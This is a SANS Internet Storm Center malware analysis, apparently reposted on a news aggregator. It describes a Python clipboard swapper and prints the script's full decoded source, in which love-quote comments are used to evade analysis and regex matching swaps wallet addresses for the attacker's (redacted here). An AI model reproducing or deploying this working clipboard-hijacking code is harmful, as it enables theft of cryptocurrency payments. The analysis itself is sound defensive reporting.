[SANS ISC] Cryptocurrency Clipboard Swapper Delivered With Love , (Mon, Aug 30th)

Be careful if you’re a user of cryptocurrencies. My goal is not to re-open a debate about them and their associated financial risks. No, I’m talking here about technical risk. Wallet addresses are long strings of characters that are pretty impossible to use manually. It means that you’ll use your clipboard to copy/paste your wallets to perform payments. But some malware monitors your clipboard for “interesting data” (like wallet addresses) and tries to replace it with another one. If you perform a payment operation, it means that you will transfer some BTC or XMR to the wrong wallet, owned by the attacker.

Yesterday, I spotted a simple malicious Python script that performs exactly this.The script SHA256 is ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343 and has a current score of 17/57[1]. The main code is obfusctated in a Base64-encode variable.

As you can see in the code below, this script is delivered with love to the victim! Random love quotes are added in the script to defeat some automated analysis. The script is based on the pyperclip[2] library that is common in the Python ecosystem. It allows manipulating the clipboard. The fact that the script does not test if the module is already installed makes me think that this script is part of a framework or has dependencies with others.

The clipboard is controlled at regular intervals and searched for classic cryptocurrencies through regular expressions. If there is a match, the clipboard content is swapped with a rogue wallet. Two are two defined in this sample.

Here is the code:

#If I know what love is
import pyperclip
#I fell in love with her courage
import json
#If you live to be a hundred
import time
#A man is already halfway in love
import re
#Women are meant to be loved
import argparse
#You make me want to be a better man
from datetime import datetime
#Thinking of you keeps me

def main():
# infinite keeps me
while 1:
now = datetime.now()

time.sleep(2) #Let me love you
#There is never a time or place for true love
user_clipboard = pyperclip.paste()
#true love
crypto_found = spiff(
user_clipboard
)
replacement_address = replace(
user_clipboard, crypto_found
)
#love is so short, forgetting is so long

master_addresses = {
“btc”: “xxxxxxxxxx”,
“xmr”: “null”,
“eth”: “xxxxxxxxxx”,
“dash”: “null”,
“xrp”: “null”,
“doge”: “null”,
“ada”: “null”,
“lite”: “null”,
“dot”: “null”,
“tron”: “null”
}
#cares and fears
def replace(user_clipboard, crypto_found):

if crypto_found != 0 and master_addresses[crypto_found] != “null”:
pyperclip.copy(master_addresses[crypto_found])
return str(master_addresses[crypto_found])
return 0
#until love’s vulnerable

def spiff(user_clipboard):
crypto_regex_match = {
“btc”: “^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$”,
“xmr”: “4[0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}”,
“eth”: “^0x[a-fA-F0-9]{40}$”,
“dash”: “^X[1-9A-HJ-NP-Za-km-z]{33}$”,
“xrp”: “^r[0-9a-zA-Z]{24,34}$”,
“doge”: “^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$”,
“ada”: “^D[A-NP-Za-km-z1-9]{35,}$”,
“lite”: “^[LM3][a-km-zA-HJ-NP-Z1-9]{25,34}$”,
“tron”: “^T[a-zA-Z0-9]{33}$”,
“dot”: “^[1-9A-HJ-NP-Za-km-z]*$”,
}
#I love you without knowing how
for k, v in crypto_regex_match.items():
if bool(re.search(v, user_clipboard)):
return str(k)

return 0
#A purpose of human life

main()
#Love is always patient and kind

I checked the two wallets in the script but then don’t show any transaction at this time.

[Update 1]

Brian Krebs contacted me to report a story he posted a few days ago about a real case of such a clipboard swapping technique[3]. This article is worth reading!

[1] https://www.virustotal.com/gui/file/ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343/detection
[2] https://pypi.org/project/pyperclip/
[3] https://krebsonsecurity.com/2021/08/man-robbed-of-16-bitcoin-sues-young-thieves-parents/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Source: Read More (SANS Internet Storm Center, InfoCON: green)

You might be interested in …

[NCSC-FI News] Experts warn of concerns around Microsoft RPC bug

Cybersecurity experts and researchers have raised alarms around a vulnerability disclosed by Microsoft Tuesday concerning Windows hosts running the Remote Procedure Call Runtime (RPC) CVE-2022-26809 has a CVSS score of 9.8 and has already been patched by Microsoft Windows hosts running the Server Message Block protocol (SMB protocol) are vulnerable to this bug. SMB protocols […]

Read More

[HackerNews] Can Your Business Email Be Spoofed? Check Your Domain Security Now!

All posts, HackerNews

Are you aware of how secure your domain is? In most organizations, there is an assumption that their domains are secure and within a few months, but the truth soon dawns on them that it isn’t. Spotting someone spoofing your domain name is one way to determine if your security is unsatisfactory – this means […]

Read More

[ZDNet] By end of 2021, Google plans to auto-enroll 150 million users in two-step verification and require 2 million YouTube creators to turn it on

All posts, ZDNet

In honor of Cybersecurity Awareness Month, Google said it wanted to make sure their products are secure “by default.” Source: Read More (Latest topics for ZDNet in Security)

Read More

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.